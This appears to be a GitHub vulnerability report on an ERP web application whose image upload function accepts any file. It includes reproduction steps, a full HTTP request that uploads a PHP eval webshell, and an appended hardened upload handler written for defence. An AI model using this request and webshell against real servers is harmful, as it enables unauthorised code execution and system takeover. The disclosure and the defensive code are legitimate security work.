File upload vulnerability getshell #3

Closed
huclilu opened this issue Nov 8, 2022 · 0 comments
huclilu commented Nov 8, 2022

1. ERP has a file upload vulnerability (getshell)

Build environment: Apache: 2.4.39; MySQL: 5.7.26

In ERP, the uploadImages function in application/controllers/basedata/inventory.php controls the file upload. It does not check the uploaded files. The uploaded files are saved in the path /data/upload/tools/. Use a webshell tool to connect to the uploaded PHP file, and then you can getshell.

2. Vulnerability reproduction:

  • Log in to the background and click Commodity Management

  • Click the image logo to add an image

  • Upload PHP Trojan Files

  • Code audit to find the path to upload files

  • Access the uploaded PHP script file and use the webshell management tool to connect

3. Exploit POC

```http
POST /index.php/basedata/inventory/uploadImages HTTP/1.1
Host: erpvul.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------603434773180687952821431423
Content-Length: 259
Origin: http://erpvul.test
Connection: close
Referer: http://erpvul.test/index.php/settings/fileUpload?_=1667908773850
Cookie: PHPSESSID=3l3leefu97g2h54kie8t9jggu4

-----------------------------603434773180687952821431423
Content-Disposition: form-data; name="files[]"; filename="ace.php"
Content-Type: application/octet-stream

<?php eval(@$_POST['ace']);?>
-----------------------------603434773180687952821431423--
```

huclilu closed this as completed Nov 11, 2022
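
The missing checks the report describes, sketched as a hardened handler for the `files[]` field seen in the request above. This is an added example, not code from the issue or from the ERP project; `store_uploaded_image()`, `handle_upload_request()`, `UPLOAD_DIR` and the size limit are hypothetical names and values.

```php
<?php
// Added example. Assumptions: UPLOAD_DIR lies outside the web root and the
// fileinfo extension is enabled. All names here are hypothetical.
const UPLOAD_DIR = '/var/app-data/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = [              // detected MIME type => extension we store
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_uploaded_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('size out of range');
    }
    // Decide the type from the content, never from the client-supplied
    // filename or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime]) || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // Server-chosen name and extension: a client name such as "ace.php"
    // never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

function handle_upload_request(): array
{
    $f = $_FILES['files'] ?? null;            // "files[]" arrives as parallel arrays
    if (!is_array($f) || !is_array($f['name'] ?? null)) {
        throw new RuntimeException('no files submitted');
    }
    $stored = [];
    foreach (array_keys($f['name']) as $i) {
        $stored[] = store_uploaded_image([
            'tmp_name' => $f['tmp_name'][$i],
            'error'    => $f['error'][$i],
            'size'     => $f['size'][$i],
        ]);
    }
    return $stored;
}
```

An image that also carries PHP text can still pass the content checks, which is why the fixed extension and a storage directory the web server does not execute from matter as much as the type check.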